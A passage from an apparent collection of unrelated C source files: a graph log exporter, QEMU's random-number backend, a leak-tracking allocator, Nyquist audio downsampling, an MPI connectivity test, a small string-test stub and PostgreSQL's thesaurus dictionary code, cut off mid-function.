fail; memcpy(msg, data, substrlen); msg[substrlen] = '\0'; if (array_append(log, &msg)) goto fail; } data += (substrlen + dlen); len -= (substrlen + dlen); } return 0; fail: return 1; } void graph_log_export(graph_t *g, char *dest, char *delim) { uint32_t i; array_t *log; uint16_t dlen; uint16_t len; char *msg; dlen = strlen(delim); log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); len = strlen(msg); memcpy(dest, msg, len); dest += len; if (i < log->size - 1) { memcpy(dest, delim, dlen); dest += dlen; } } dest[0] = '\0'; }
703736.c
/* * QEMU Random Number Generator Backend * * Copyright IBM, Corp. 2012 * * Authors: * Anthony Liguori <aliguori@us.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "sysemu/rng.h" #include "qapi/qmp/qerror.h" #include "qom/object_interfaces.h" void rng_backend_request_entropy(RngBackend *s, size_t size, EntropyReceiveFunc *receive_entropy, void *opaque) { RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); if (k->request_entropy) { k->request_entropy(s, size, receive_entropy, opaque); } } void rng_backend_cancel_requests(RngBackend *s) { RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); if (k->cancel_requests) { k->cancel_requests(s); } } static bool rng_backend_prop_get_opened(Object *obj, Error **errp) { RngBackend *s = RNG_BACKEND(obj); return s->opened; } static void rng_backend_complete(UserCreatable *uc, Error **errp) { object_property_set_bool(OBJECT(uc), true, "opened", errp); } static void rng_backend_prop_set_opened(Object *obj, bool value, Error **errp) { RngBackend *s = RNG_BACKEND(obj); RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); Error *local_err = NULL; if (value == s->opened) { return; } if (!value && s->opened) { error_setg(errp, QERR_PERMISSION_DENIED); return; } if (k->opened) { k->opened(s, &local_err); if (local_err) { error_propagate(errp, local_err); return; } } s->opened = true; } static void rng_backend_init(Object *obj) { object_property_add_bool(obj, "opened", rng_backend_prop_get_opened, rng_backend_prop_set_opened, NULL); } static void rng_backend_class_init(ObjectClass *oc, void *data) { UserCreatableClass *ucc = USER_CREATABLE_CLASS(oc); ucc->complete = rng_backend_complete; } static const TypeInfo rng_backend_info = { .name = TYPE_RNG_BACKEND, .parent = TYPE_OBJECT, .instance_size = sizeof(RngBackend), .instance_init = rng_backend_init, .class_size = sizeof(RngBackendClass), .class_init = rng_backend_class_init, .abstract = true, .interfaces = (InterfaceInfo[]) { { TYPE_USER_CREATABLE }, { } } }; static void register_types(void) { type_register_static(&rng_backend_info); } type_init(register_types);
34514.c
#include "debug.h" #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #ifndef MDEBUG ALLOC void* xmalloc(size_t size) { void* buf = malloc(size); if(buf == NULL) { fprintf(stderr, "It is not enough memory"); exit(1); } return buf; } ALLOC char* xstrdup(char* str) { char* buf = strdup(str); if(buf == NULL) { fprintf(stderr, "It is not enough memory\n"); exit(1); } return buf; } ALLOC void* xrealloc(void* ptr, size_t size) { char* buf = realloc(ptr, size); if(buf == NULL) { fprintf(stderr, "It is not enough memory\n"); exit(1); } return buf; } #else static char* xstrncpy(char* des, char* src, int size) { des[size-1] = 0; return strncpy(des, src, size-1); } static char* xstrncat(char* des, char* str, int size) { des[size-1] = 0; return strncat(des, str, size-1); } ////////////////////////////////////////////////////////////////////// // for memory leak checking ////////////////////////////////////////////////////////////////////// #define NAME_SIZE 128 typedef struct _t_malloc_entry { void* mMemory; char mFileName[NAME_SIZE]; int mLine; char mFuncName[NAME_SIZE]; struct _t_malloc_entry* mNextEntry; } t_malloc_entry; #define ARRAY_SIZE 65535 static t_malloc_entry* gMallocEntries[ARRAY_SIZE]; void release_entry(void* memory, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; #ifdef __64bit__ unsigned long long hash = ((unsigned long long)memory) % ARRAY_SIZE; #else unsigned long hash = ((unsigned long )memory) % ARRAY_SIZE; #endif entry = gMallocEntries[hash]; if(entry->mMemory == memory) { t_malloc_entry* next_entry = entry->mNextEntry; free(entry); gMallocEntries[hash] = next_entry; return ; } else { while(entry->mNextEntry) { if(entry->mNextEntry->mMemory == memory) { t_malloc_entry* next_entry = entry->mNextEntry->mNextEntry; free(entry->mNextEntry); entry->mNextEntry = next_entry; return; } entry = entry->mNextEntry; } } #ifdef __64bit__ fprintf(stderr, "\tinvalid free at file: %s line:%d function:%s() addr:%llx\n", entry->mFileName, entry->mLine, entry->mFuncName, (unsigned long long)entry->mMemory); #else fprintf(stderr, "\tinvalid free at file: %s line:%d function:%s() addr:%lx\n", entry->mFileName, entry->mLine, entry->mFuncName, (unsigned long)entry->mMemory); #endif } ////////////////////////////////////////////////////////////////////// // memory leak checking starts ////////////////////////////////////////////////////////////////////// void debug_init() { memset(gMallocEntries, 0, sizeof(t_malloc_entry*)*ARRAY_SIZE); } ////////////////////////////////////////////////////////////////////// // memory leak checking finish ////////////////////////////////////////////////////////////////////// void debug_final() { int i; fprintf(stderr, "Detecting memory leak...\n"); for(i=0; i<ARRAY_SIZE; i++) { t_malloc_entry* entry = gMallocEntries[i]; while(entry) { #ifdef __64bit__ fprintf(stderr, "\tDetected!! at file: %s line:%d function:%s() addr:%llx\n" , entry->mFileName, entry->mLine , entry->mFuncName, (unsigned long long)entry->mMemory); #else fprintf(stderr, "\tDetected!! at file: %s line:%d function:%s() addr:%lx\n" , entry->mFileName, entry->mLine , entry->mFuncName, (unsigned long)entry->mMemory); #endif entry = entry->mNextEntry; } } fprintf(stderr, "done.\n"); } ////////////////////////////////////////////////////////////////////// // malloc for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC void* debug_malloc(size_t size, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; int i; int hash; entry = (t_malloc_entry*)malloc(sizeof(t_malloc_entry)); xstrncpy(entry->mFileName, (char*)file_name, NAME_SIZE); entry->mLine = line; xstrncpy(entry->mFuncName, (char*)func_name, NAME_SIZE); entry->mMemory = malloc(size); #ifdef __64bit__ hash = (unsigned long long)entry->mMemory % ARRAY_SIZE; #else hash = (unsigned long)entry->mMemory % ARRAY_SIZE; #endif entry->mNextEntry = gMallocEntries[hash]; gMallocEntries[hash] = entry; return entry->mMemory; } ////////////////////////////////////////////////////////////////////// // realloc for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC void* debug_realloc(void* memory, size_t size, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; int hash; /// delete old entry /// if(memory) release_entry(memory, file_name, line, func_name); /// add new entry /// entry = (t_malloc_entry*)malloc(sizeof(t_malloc_entry)); xstrncpy(entry->mFileName, (char*)file_name, NAME_SIZE); entry->mLine = line; xstrncpy(entry->mFuncName, (char*)func_name, NAME_SIZE); entry->mMemory = realloc(memory, size); if(entry->mMemory == NULL) { fprintf(stderr,"false in allocating memory."); exit(1); } #ifdef __64bit__ hash = (unsigned long long)entry->mMemory % ARRAY_SIZE; #else hash = (unsigned long)entry->mMemory % ARRAY_SIZE; #endif entry->mNextEntry = gMallocEntries[hash]; gMallocEntries[hash] = entry; return entry->mMemory; } ////////////////////////////////////////////////////////////////////// // strdup for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC char* debug_strdup(char* str, const char* file_name, int line, const char* func_name) { char* result; result = (char*)debug_malloc(sizeof(char)*(strlen(str)+1), file_name, line, func_name); xstrncpy(result, str, strlen(str)+1); return result; } ////////////////////////////////////////////////////////////////////// // free for memory leak chekcing ////////////////////////////////////////////////////////////////////// void debug_free(void* memory, const char* file_name, int line, const char* func_name) { release_entry(memory, file_name, line, func_name); free(memory); } #endif
543564.c
/* downsample.c -- linear interpolation to a lower sample rate */ /* CHANGE LOG * -------------------------------------------------------------------- * 28Apr03 dm changes for portability and fix compiler warnings */ #include "stdio.h" #ifndef mips #include "stdlib.h" #endif #include "xlisp.h" #include "sound.h" #include "falloc.h" #include "cext.h" #include "downsample.h" void down_free(snd_susp_type a_susp); typedef struct down_susp_struct { snd_susp_node susp; boolean started; long terminate_cnt; boolean logically_stopped; sound_type s; long s_cnt; sample_block_values_type s_ptr; /* support for interpolation of s */ sample_type s_x1_sample; double s_pHaSe; double s_pHaSe_iNcR; /* support for ramp between samples of s */ double output_per_s; long s_n; } down_susp_node, *down_susp_type; void down_i_fetch(snd_susp_type a_susp, snd_list_type snd_list) { down_susp_type susp = (down_susp_type) a_susp; int cnt = 0; /* how many samples computed */ sample_type s_x2_sample; int togo; int n; sample_block_type out; register sample_block_values_type out_ptr; register sample_block_values_type out_ptr_reg; register double s_pHaSe_iNcR_rEg = susp->s_pHaSe_iNcR; register double s_pHaSe_ReG; register sample_type s_x1_sample_reg; falloc_sample_block(out, "down_i_fetch"); out_ptr = out->samples; snd_list->block = out; /* make sure sounds are primed with first values */ if (!susp->started) { susp->started = true; susp_check_term_log_samples(s, s_ptr, s_cnt); susp->s_x1_sample = susp_fetch_sample(s, s_ptr, s_cnt); } susp_check_term_log_samples(s, s_ptr, s_cnt); s_x2_sample = susp_current_sample(s, s_ptr); /* initially, s_x1_sample and s_x2_samples will be the first 2 samples * and phase will be zero, so interpolation between these two will yield * s_x1_sample. */ while (cnt < max_sample_block_len) { /* outer loop */ /* first compute how many samples to generate in inner loop: */ /* don't overflow the output sample block: */ togo = max_sample_block_len - cnt; /* don't run past terminate time */ if (susp->terminate_cnt != UNKNOWN && susp->terminate_cnt <= susp->susp.current + cnt + togo) { togo = susp->terminate_cnt - (susp->susp.current + cnt); if (togo <= 0) { togo = 0; break; } } /* don't run past logical stop time */ if (!susp->logically_stopped && susp->susp.log_stop_cnt != UNKNOWN) { int to_stop = susp->susp.log_stop_cnt - (susp->susp.current + cnt); /* break if to_stop == 0 (we're at the logical stop) * AND cnt > 0 (we're not at the beginning of the * output block). */ if (to_stop < togo) { if (to_stop == 0) { if (cnt) { togo = 0; break; } else /* keep togo as is: since cnt == 0, we * can set the logical stop flag on this * output block */ susp->logically_stopped = true; } else /* limit togo so we can start a new * block at the LST */ togo = to_stop; } } n = togo; s_pHaSe_ReG = susp->s_pHaSe; s_x1_sample_reg = susp->s_x1_sample; out_ptr_reg = out_ptr; if (n) do { while (s_pHaSe_ReG >= 1.0) { if (s_pHaSe_ReG < 2) { /* quick, just take one sample */ s_x1_sample_reg = s_x2_sample; /* pick up next sample as s_x2_sample: */ susp->s_ptr++; susp_took(s_cnt, 1); s_pHaSe_ReG -= 1.0; } else { /* jump over as much input as possible */ int take = (int) s_pHaSe_ReG; /* rounds down */ take--; /* leave s_pHaSe_ReG > 1 so we stay in loop */ /* next iteration will set s_x1_sample_reg */ if (take > susp->s_cnt) take = susp->s_cnt; susp->s_ptr += take; susp_took(s_cnt, take); s_pHaSe_ReG -= take; } /* derived from susp_check_term_log_samples_break, but with a goto instead of a break */ if (susp->s_cnt == 0) { susp_get_samples(s, s_ptr, s_cnt); terminate_test(s_ptr, s, susp->s_cnt); /* see if newly discovered logical stop time: */ logical_stop_test(s, susp->s_cnt); if ((susp->terminate_cnt != UNKNOWN && susp->terminate_cnt < susp->susp.current + cnt + togo) || (!susp->logically_stopped && susp->susp.log_stop_cnt != UNKNOWN && susp->susp.log_stop_cnt < susp->susp.current + cnt + togo)) { /* Because we are down sampling, we could have just computed an output at sample N and be working on sample N+1, but then the next input sample is logically stopped. Bad because we cannot back up and undo sample N to put it in the next block with a logical stop flag set. Our only choice is to "fix" the logical stop time to be on the next sample. */ if (susp->terminate_cnt != UNKNOWN && susp->terminate_cnt < susp->susp.current + togo - n) { susp->terminate_cnt = susp->susp.current + togo - n; } if (susp->susp.log_stop_cnt != UNKNOWN && susp->susp.log_stop_cnt < susp->susp.current + togo - n) { susp->susp.log_stop_cnt = susp->susp.current + togo - n; } goto breakout; } } s_x2_sample = susp_current_sample(s, s_ptr); } *out_ptr_reg++ = (sample_type) (s_x1_sample_reg * (1 - s_pHaSe_ReG) + s_x2_sample * s_pHaSe_ReG); s_pHaSe_ReG += s_pHaSe_iNcR_rEg; } while (--n); /* inner loop */ breakout: togo -= n; susp->s_pHaSe = s_pHaSe_ReG; susp->s_x1_sample = s_x1_sample_reg; out_ptr += togo; cnt += togo; } /* outer loop */ /* test for termination */ if (togo == 0 && cnt == 0) { snd_list_terminate(snd_list); } else { snd_list->block_len = cnt; susp->susp.current += cnt; } /* test for logical stop */ if (susp->logically_stopped) { snd_list->logically_stopped = true; } else if (susp->susp.log_stop_cnt == susp->susp.current) { susp->logically_stopped = true; } } /* down_i_fetch */ void down_toss_fetch(snd_susp_type a_susp, snd_list_type snd_list) { down_susp_type susp = (down_susp_type) a_susp; long final_count = MIN(susp->susp.current + max_sample_block_len, susp->susp.toss_cnt); time_type final_time = susp->susp.t0 + final_count / susp->susp.sr; long n; /* fetch samples from s up to final_time for this block of zeros */ while (((long) ((final_time - susp->s->t0) * susp->s->sr + 0.5)) >= susp->s->current) susp_get_samples(s, s_ptr, s_cnt); /* convert to normal processing when we hit final_count */ /* we want each signal positioned at final_time */ if (final_count == susp->susp.toss_cnt) { n = ROUNDBIG((final_time - susp->s->t0) * susp->s->sr - (susp->s->current - susp->s_cnt)); susp->s_ptr += n; susp_took(s_cnt, n); susp->susp.fetch = susp->susp.keep_fetch; } snd_list->block_len = (short) (final_count - susp->susp.current); susp->susp.current = final_count; snd_list->u.next = snd_list_create((snd_susp_type) susp); snd_list->block = internal_zero_block; } void down_mark(snd_susp_type a_susp) { down_susp_type susp = (down_susp_type) a_susp; sound_xlmark(susp->s); } void down_free(snd_susp_type a_susp) { down_susp_type susp = (down_susp_type) a_susp; sound_unref(susp->s); ffree_generic(susp, sizeof(down_susp_node), "down_free"); } void down_print_tree(snd_susp_type a_susp, int n) { down_susp_type susp = (down_susp_type) a_susp; indent(n); stdputstr("s:"); sound_print_tree_1(susp->s, n); } sound_type snd_make_down(rate_type sr, sound_type s) { register down_susp_type susp; /* sr specified as input parameter */ time_type t0 = s->t0; sample_type scale_factor = 1.0F; time_type t0_min = t0; if (s->sr < sr) { sound_unref(s); xlfail("snd-down: output sample rate must be lower than input"); } falloc_generic(susp, down_susp_node, "snd_make_down"); susp->susp.fetch = down_i_fetch; susp->terminate_cnt = UNKNOWN; /* handle unequal start times, if any */ if (t0 < s->t0) sound_prepend_zeros(s, t0); /* minimum start time over all inputs: */ t0_min = min(s->t0, t0); /* how many samples to toss before t0: */ susp->susp.toss_cnt = (long) ((t0 - t0_min) * sr + 0.5); if (susp->susp.toss_cnt > 0) { susp->susp.keep_fetch = susp->susp.fetch; susp->susp.fetch = down_toss_fetch; } /* initialize susp state */ susp->susp.free = down_free; susp->susp.sr = sr; susp->susp.t0 = t0; susp->susp.mark = down_mark; susp->susp.print_tree = down_print_tree; susp->susp.name = "down"; susp->logically_stopped = false; susp->susp.log_stop_cnt = logical_stop_cnt_cvt(s); susp->started = false; susp->susp.current = 0; susp->s = s; susp->s_cnt = 0; susp->s_pHaSe = 0.0; susp->s_pHaSe_iNcR = s->sr / sr; susp->s_n = 0; susp->output_per_s = sr / s->sr; return sound_create((snd_susp_type)susp, t0, sr, scale_factor); } sound_type snd_down(rate_type sr, sound_type s) { sound_type s_copy = sound_copy(s); return snd_make_down(sr, s_copy); }
564222.c
/* * Copyright (c) 2007 Sun Microsystems, Inc. All rights reserved. */ /* * Test the connectivity between all processes. */ #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <unistd.h> #include <mpi.h> int main(int argc, char **argv) { MPI_Status status; int verbose = 0; int rank; int np; /* number of processes in job */ int peer; int i; int j; int length; char name[MPI_MAX_PROCESSOR_NAME+1]; MPI_Init(&argc, &argv); MPI_Comm_rank(MPI_COMM_WORLD, &rank); MPI_Comm_size(MPI_COMM_WORLD, &np); /* * If we cannot get the name for whatever reason, just * set it to unknown. */ if (MPI_SUCCESS != MPI_Get_processor_name(name, &length)) { strcpy(name, "unknown"); } if (argc>1 && strcmp(argv[1], "-v")==0) verbose = 1; for (i=0; i<np; i++) { if (rank==i) { /* rank i sends to and receives from each higher rank */ for(j=i+1; j<np; j++) { if (verbose) printf("checking connection between rank %d on %s and rank %-4d\n", i, name, j); MPI_Send(&rank, 1, MPI_INT, j, rank, MPI_COMM_WORLD); MPI_Recv(&peer, 1, MPI_INT, j, j, MPI_COMM_WORLD, &status); } } else if (rank>i) { /* receive from and reply to rank i */ MPI_Recv(&peer, 1, MPI_INT, i, i, MPI_COMM_WORLD, &status); MPI_Send(&rank, 1, MPI_INT, i, rank, MPI_COMM_WORLD); } } MPI_Barrier(MPI_COMM_WORLD); if (rank==0) printf("Connectivity test on %d processes PASSED.\n", np); MPI_Finalize(); return 0; }
13252.c
#include <stdio.h> int ft_str_is_uppercase(char *str); int main(void) { int flag; char *t; t = ""; flag = ft_str_is_uppercase(t); printf("%d\n", flag); return (0); }
198977.c
/*------------------------------------------------------------------------- * * dict_thesaurus.c * Thesaurus dictionary: phrase to phrase substitution * * Portions Copyright (c) 1996-2017, PostgreSQL Global Development Group * * * IDENTIFICATION * src/backend/tsearch/dict_thesaurus.c * *------------------------------------------------------------------------- */ #include "postgres.h" #include "catalog/namespace.h" #include "commands/defrem.h" #include "tsearch/ts_cache.h" #include "tsearch/ts_locale.h" #include "tsearch/ts_utils.h" #include "utils/builtins.h" #include "utils/regproc.h" /* * Temporay we use TSLexeme.flags for inner use... */ #define DT_USEASIS 0x1000 typedef struct LexemeInfo { uint32 idsubst; /* entry's number in DictThesaurus->subst */ uint16 posinsubst; /* pos info in entry */ uint16 tnvariant; /* total num lexemes in one variant */ struct LexemeInfo *nextentry; struct LexemeInfo *nextvariant; } LexemeInfo; typedef struct { char *lexeme; LexemeInfo *entries; } TheLexeme; typedef struct { uint16 lastlexeme; /* number lexemes to substitute */ uint16 reslen; TSLexeme *res; /* prepared substituted result */ } TheSubstitute; typedef struct { /* subdictionary to normalize lexemes */ Oid subdictOid; TSDictionaryCacheEntry *subdict; /* Array to search lexeme by exact match */ TheLexeme *wrds; int nwrds; /* current number of words */ int ntwrds; /* allocated array length */ /* * Storage of substituted result, n-th element is for n-th expression */ TheSubstitute *subst; int nsubst; } DictThesaurus; static void newLexeme(DictThesaurus *d, char *b, char *e, uint32 idsubst, uint16 posinsubst) { TheLexeme *ptr; if (d->nwrds >= d->ntwrds) { if (d->ntwrds == 0) { d->ntwrds = 16; d->wrds = (TheLexeme *) palloc(sizeof(TheLexeme) * d->ntwrds); } else { d->ntwrds *= 2; d->wrds = (TheLexeme *) repalloc(d->wrds, sizeof(TheLexeme) * d->ntwrds); } } ptr = d->wrds + d->nwrds; d->nwrds++; ptr->lexeme = palloc(e - b + 1); memcpy(ptr->lexeme, b, e - b); ptr->lexeme[e - b] = '\0'; ptr->entries = (LexemeInfo *) palloc(sizeof(LexemeInfo)); ptr->entries->nextentry = NULL; ptr->entries->idsubst = idsubst; ptr->entries->posinsubst = posinsubst; } static void addWrd(DictThesaurus *d, char *b, char *e, uint32 idsubst, uint16 nwrd, uint16 posinsubst, bool useasis) { static int nres = 0; static int ntres = 0; TheSubstitute *ptr; if (nwrd == 0) { nres = ntres = 0; if (idsubst >= d->nsubst) { if (d->nsubst == 0) { d->nsubst = 16; d->subst = (TheSubstitute *) palloc(sizeof(TheSubstitute) * d->nsubst); } else { d->nsubst *= 2; d->subst = (TheSubstitute *) repalloc(d->subst, sizeof(TheSubstitute) * d->nsubst); } } } ptr = d->subst + idsubst; ptr->lastlexeme = posinsubst - 1; if (nres + 1 >= ntres) { if (ntres == 0) { ntres = 2; ptr->res = (TSLexeme *) palloc(sizeof(TSLexeme) * ntres); } else { ntres *= 2; ptr->res = (TSLexeme *) repalloc(ptr->res, sizeof(TSLexeme) * ntres); } } ptr->res[nres].lexeme = palloc(e - b + 1); memcpy(ptr->res[nres].lexeme, b, e - b); ptr->res[nres].lexeme[e - b] = '\0'; ptr->res[nres].nvariant = nwrd; if (useasis) ptr->res[nres].flags = DT_USEASIS; else ptr->res[nres].flags = 0; ptr->res[++nres].lexeme = NULL; } #define TR_WAITLEX 1 #define TR_INLEX 2 #define TR_WAITSUBS 3 #define TR_INSUBS 4 static void thesaurusRead(char *filename, DictThesaurus *d) { tsearch_readline_state trst; uint32 idsubst = 0; bool useasis = false; char *line; filename = get_tsearch_config_filename(filename, "ths"); if (!tsearch_readline_begin(&trst, filename)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("could not open thesaurus file \"%s\": %m", filename))); while ((line = tsearch_readline(&trst)) != NULL) { char *ptr; int state = TR_WAITLEX; char *beginwrd = NULL; uint32 posinsubst = 0; uint32 nwrd = 0; ptr = line; /* is it a comment? */ while (*ptr && t_isspace(ptr)) ptr += pg_mblen(ptr); if (t_iseq(ptr, '#') || *ptr == '\0' || t_iseq(ptr, '\n') || t_iseq(ptr, '\r')) { pfree(line); continue; } while (*ptr) { if (state == TR_WAITLEX) { if (t_iseq(ptr, ':')) { if (posinsubst == 0) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected delimiter"))); state = TR_WAITSUBS; } else if (!t_isspace(ptr)) { beginwrd = ptr; state = TR_INLEX; } } else if (state == TR_INLEX) { if (t_iseq(ptr, ':')) { newLexeme(d, beginwrd, ptr, idsubst, posinsubst++); state = TR_WAITSUBS; } else if (t_isspace(ptr)) { newLexeme(d, beginwrd, ptr, idsubst, posinsubst++); state = TR_WAITLEX; } } else if (state == TR_WAITSUBS) { if (t_iseq(ptr, '*')) { useasis = true; state = TR_INSUBS; beginwrd = ptr + pg_mblen(ptr); } else if (t_iseq(ptr, '\\')) { useasis = false; state = TR_INSUBS; beginwrd = ptr + pg_mblen(ptr); } else if (!t_isspace(ptr)) { useasis = false; beginwrd = ptr; state = TR_INSUBS; } } else if (state == TR_INSUBS) { if (t_isspace(ptr)) { if (ptr == beginwrd) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line or lexeme"))); addWrd(d, beginwrd, ptr, idsubst, nwrd++, posinsubst, useasis); state = TR_WAITSUBS; } } else elog(ERROR, "unrecognized thesaurus state: %d", state); ptr += pg_mblen(ptr); } if (state == TR_INSUBS) { if (ptr == beginwrd) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line or lexeme"))); addWrd(d, beginwrd, ptr, idsubst, nwrd++, posinsubst, useasis); } idsubst++; if (!(nwrd && posinsubst)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line"))); /* * Note: currently, tsearch_readline can't return lines exceeding 4KB, * so overflow of the word counts is impossible. But that may not * always be true, so let's check. */ if (nwrd != (uint16) nwrd || posinsubst != (uint16) posinsubst) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("too many lexemes in thesaurus entry"))); pfree(line); } d->nsubst = idsubst; tsearch_readline_end(&trst); } static TheLexeme * addCompiledLexeme(TheLexeme *newwrds, int *nnw, int *tnm, TSLexeme *lexeme, LexemeInfo *src, uint16 tnvariant) { if (*nnw >= *tnm) { *tnm *= 2; newwrds = (TheLexeme *) repalloc(newwrds, sizeof(TheLexeme) * *tnm); } newwrds[*nnw].entries = (LexemeInfo *) palloc(sizeof(LexemeInfo)); if (lexeme && lexeme->lexeme) { newwrds[*nnw].lexeme = pstrdup(lexeme->lexeme); newwrds[*nnw].entries->tnvariant = tnvariant; } else { newwrds[*nnw].lexeme = NULL; newwrds[*nnw].entries->tnvariant = 1; } newwrds[*nnw].entries->idsubst = src->idsubst; newwrds[*nnw].entries->posinsubst = src->posinsubst; newwrds[*nnw].entries->nextentry = NULL; (*nnw)++; return newwrds; } static int cmpLexemeInfo(LexemeInfo *a, LexemeInfo *b) { if (a == NULL || b == NULL) return 0; if (a->idsubst == b->idsubst) { if (a->posinsubst == b->posinsubst) { if (a->tnvariant == b->tnvariant) return 0; return (a->tnvariant > b->tnvariant) ? 1 : -1; } return (a->posinsubst > b->posinsubst) ? 1 : -1; } return (a->idsubst > b->idsubst) ? 1 : -1; } static int cmpLexeme(const TheLexeme *a, const TheLexeme *b) { if (a->lexeme == NULL) { if (b->lexeme == NULL) return 0; else return 1; } else if (b->lexeme == NULL) return -1; return strcmp(a->lexeme, b->lexeme); } static int cmpLexemeQ(const void *a, const void *b) { return cmpLexeme((const TheLexeme *) a, (const TheLexeme *) b); } static int cmpTheLexeme(const void *a, const void *b) { const TheLexeme *la = (const TheLexeme *) a; const TheLexeme *lb = (const TheLexeme *) b; int res; if ((res = cmpLexeme(la, lb)) != 0) return res; return -cmpLexemeInfo(la->entries, lb->entries); } static void compileTheLexeme(DictThesaurus *d) { int i, nnw = 0, tnm = 16; TheLexeme *newwrds = (TheLexeme *) palloc(sizeof(TheLexeme) * tnm), *ptrwrds; for (i = 0; i < d->nwrds; i++) { TSLexeme *ptr; if (strcmp(d->wrds[i].lexeme, "?") == 0) /* Is stop word marker? */ newwrds = addCompiledLexeme(newwrds, &nnw, &tnm, NULL, d->wrds[i].entries, 0); else { ptr = (TSLexeme *) DatumGetPointer(FunctionCall4(&(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PointerGetDatum(d->wrds[i].lexeme), Int32GetDatum(strlen(d->wrds[i].lexeme)), PointerGetDatum(NULL))); if (!ptr) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus sample word \"%s\" isn't recognized by subdictionary (rule %d)", d->wrds[i].lexeme, d->wrds[i].entries->idsubst + 1))); else if (!(ptr->lexeme)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus sample word \"%s\" is a stop word (rule %d)", d->wrds[i].lexeme, d->wrds[i].entries->idsubst + 1), errhint("Use \"?\" to represent a stop word within a sample phrase."))); else { while (ptr->lexeme) { TSLexeme *remptr = ptr + 1; int tnvar = 1; int curvar = ptr->nvariant; /* compute n words in one variant */ while (remptr->lexeme) { if (remptr->nvariant != (remptr - 1)->nvariant) break; tnvar++; remptr++; } remptr = ptr; while (remptr->lexeme && remptr->nvariant == curvar) { newwrds = addCompiledLexeme(newwrds, &nnw, &tnm, remptr, d->wrds[i].entries, tnvar); remptr++; } ptr = remptr; } } } pfree(d->wrds[i].lexeme); pfree(d->wrds[i].entries); } if (d->wrds) pfree(d->wrds); d->wrds = newwrds; d->nwrds = nnw; d->ntwrds = tnm; if (d->nwrds > 1) { qsort(d->wrds, d->nwrds, sizeof(TheLexeme), cmpTheLexeme); /* uniq */ newwrds = d->wrds; ptrwrds = d->wrds + 1; while (ptrwrds - d->wrds < d->nwrds) { if (cmpLexeme(ptrwrds, newwrds) == 0) { if (cmpLexemeInfo(ptrwrds->entries, newwrds->entries)) { ptrwrds->entries->nextentry = newwrds->entries; newwrds->entries = ptrwrds->entries; } else pfree(ptrwrds->entries); if (ptrwrds->lexeme) pfree(ptrwrds->lexeme); } else { newwrds++; *newwrds = *ptrwrds; } ptrwrds++; } d->nwrds = newwrds - d->wrds + 1; d->wrds = (TheLexeme *) repalloc(d->wrds, sizeof(TheLexeme) * d->nwrds); } } static void compileTheSubstitute(DictThesaurus *d) { int i; for (i = 0; i < d->nsubst; i++) { TSLexeme *rem = d->subst[i].res, *outptr, *inptr; int n = 2; outptr = d->subst[i].res = (TSLexeme *) palloc(sizeof(TSLexeme) * n); outptr->lexeme = NULL; inptr = rem; while (inptr && inptr->lexeme) { TSLexeme *lexized, tmplex[2]; if (inptr->flags & DT_USEASIS) { /* do not lexize */ tmplex[0] = *inptr; tmplex[0].flags = 0; tmplex[1].lexeme = NULL; lexized = tmplex; } else { lexized = (TSLexeme *) DatumGetPointer( FunctionCall4( &(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PointerGetDatum(inptr->lexeme), Int32GetDatum(strlen(inptr->lexeme)), PointerGetDatum(NULL) ) ); } if (lexized && lexized->lexeme) { int toset = (lexized->lexeme && outptr != d->subst[i].res) ? (outptr - d->subst[i].res) : -1; while (lexized->lexeme) { if (outptr - d->subst[i].res + 1 >= n) { int diff = outptr - d->subst[i].res; n *= 2; d->subst[i].res = (TSLexeme *) repalloc(d->subst[i].res, sizeof(TSLexeme) * n); outptr = d->subst[i].res + diff; } *outptr = *lexized; outptr->lexeme = pstrdup(lexized->lexeme); outptr++; lexized++; } if (toset > 0) d->subst[i].res[toset].flags |= TSL_ADDPOS; } else if (lexized) { ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute word \"%s\" is a stop word (rule %d)", inptr->lexeme, i + 1))); } else { ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute word \"%s\" isn't recognized by subdictionary (rule %d)", inptr->lexeme, i + 1))); } if (inptr->lexeme) pfree(inptr->lexeme); inptr++; } if (outptr == d->subst[i].res) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute phrase is empty (rule %d)", i + 1))); d->subst[i].reslen = outptr - d->subst[i].res; pfree(rem); } } Datum thesaurus_init(PG_FUNCTION_ARGS) { List *dictoptions = (List *) PG_GETARG_POINTER(0); DictThesaurus *d; char *subdictname = NULL; bool fileloaded = false; ListCell *l; d = (DictThesaurus *) palloc0(sizeof(DictThesaurus)); foreach(l, dictoptions) { DefElem *defel = (DefElem *) lfirst(l); if (pg_strcasecmp("DictFile", defel->defname) == 0) { if (fileloaded) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("multiple DictFile parameters"))); thesaurusRead(defGetString(defel), d); fileloaded = true; } else if (pg_strcasecmp("Dictionary", defel->defname) == 0) { if (subdictname) ereport(ERROR, 